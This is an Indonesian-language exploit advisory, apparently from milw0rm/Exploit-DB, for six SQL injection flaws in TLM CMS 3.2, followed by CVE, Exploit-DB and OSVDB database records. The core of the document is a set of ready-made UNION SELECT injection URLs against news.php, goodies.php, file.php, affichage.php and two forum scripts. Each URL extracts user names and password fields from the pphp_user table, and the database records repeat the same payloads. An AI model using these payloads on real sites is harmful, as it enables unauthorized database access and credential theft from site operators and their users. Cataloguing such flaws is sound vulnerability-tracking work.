########################################################################
# TLM CMS v3.2 - Multiple Remote SQL Injection Vulnerabilities
# Vendor : http://tlm.hebserv.fr/
# Download : http://tlm.hebserv.fr/mod_file/upload/tlmcms32.zip
# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org
# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net
########################################################################
Kutu pada berkas 'news.php';
http://localhost/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*
Kutu pada berkas 'goodies.php';
http://localhost/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*
<-------------------------->
Jika magic_quotes_gpc = off, maka pada berkas2 berikut dapat memanipulasi
SQL query;
Kutu pada berkas 'file.php';
http://localhost/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*
Kutu pada berkas 'affichage.php';
http://localhost/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*
Kutu pada berkas '/mod_forum/afficher.php';
http://localhost/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*
Kutu pada berkas '/mod_forum/messages.php';
http://localhost/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*
########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
Cintailah Bahasa Indonesia
# milw0rm.com [2007-09-08]
{"id": "EDB-ID:4376", "hash": "362d89974e1ce29bd4e9e065f8098b56", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TLM CMS 3.2 - Multiple Remote SQL Injection Vulnerabilities", "description": "TLM CMS 3.2 Multiple Remote SQL Injection Vulnerabilities. CVE-2007-4808. Webapps exploit for php platform", "published": "2007-09-08T00:00:00", "modified": "2007-09-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4376/", "reporter": "k1tk4t", "references": [], "cvelist": ["CVE-2007-4808"], "lastseen": "2016-01-31T20:47:14", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-01-31T20:47:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4808"]}, {"type": "osvdb", "idList": ["OSVDB:37006", "OSVDB:37002", "OSVDB:37005", "OSVDB:37003", "OSVDB:37001", "OSVDB:37004"]}], "modified": "2016-01-31T20:47:14"}, "vulnersScore": 7.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4376/", "sourceData": "########################################################################\n# TLM CMS v3.2 - Multiple Remote SQL Injection Vulnerabilities\n# Vendor : http://tlm.hebserv.fr/\n# Download : http://tlm.hebserv.fr/mod_file/upload/tlmcms32.zip\n# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org\n# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net\n########################################################################\nKutu pada berkas 'news.php';\nhttp://localhost/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*\n\nKutu pada berkas 'goodies.php';\nhttp://localhost/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*\n\n<-------------------------->\nJika magic_quotes_gpc = off, maka pada berkas2 berikut dapat memanipulasi\nSQL query;\n\nKutu pada berkas 'file.php';\nhttp://localhost/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*\n\nKutu pada berkas 'affichage.php';\nhttp://localhost/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*\n\nKutu pada berkas '/mod_forum/afficher.php';\nhttp://localhost/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*\n\nKutu pada berkas '/mod_forum/messages.php';\nhttp://localhost/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*\n\n########################################################################\nTerimakasih untuk;\nstr0ke, DNX\nxoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank\ndan semua temen2 komunitas security&hacking\n-----------------------\n-newhack[dot]org|staff-\nmR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX\n-----------------------\nall member newhack[dot]org\n-----------------------\nall member www.echo.or.id\n-----------------------\nall member www.yogyafree.net\n-----------------------\nall member www.sekuritionline.net\n-----------------------\nall member www.kecoak-elektronik.net\n-----------------------\nsemua komunitas hacker&security Indonesia\nCintailah Bahasa Indonesia\n\n# milw0rm.com [2007-09-08]\n", "osvdbidlist": ["37001", "37005", "37006", "37004", "37003", "37002"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:01", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in TLM CMS 3.2 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to news.php in a lirenews action, (2) the idnews parameter to goodies.php in a lire action, (3) the id parameter to file.php in a voir action, (4) the ID parameter to affichage.php, (5) the id_sal parameter to mod_forum/afficher.php, or (6) the id_sujet parameter to mod_forum/messages.php. NOTE: it was later reported that goodies.php and affichage.php scripts are reachable through index.php, and 1.1 is also affected. NOTE: it was later reported that the goodies.php vector also affects 3.1.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-4808", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4808", "published": "2007-09-11T18:17:00", "title": "CVE-2007-4808", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37006", "id": "OSVDB:37006", "title": "TLM CMS mod_forum/messages.php id_sujet Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37002", "id": "OSVDB:37002", "title": "TLM CMS goodies.php idnews Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37005", "id": "OSVDB:37005", "title": "TLM CMS mod_forum/afficher.php id_sal Vaariable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37001", "id": "OSVDB:37001", "title": "TLM CMS news.php id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37003", "id": "OSVDB:37003", "title": "TLM CMS file.php id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37004", "id": "OSVDB:37004", "title": "TLM CMS affichage.php ID Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}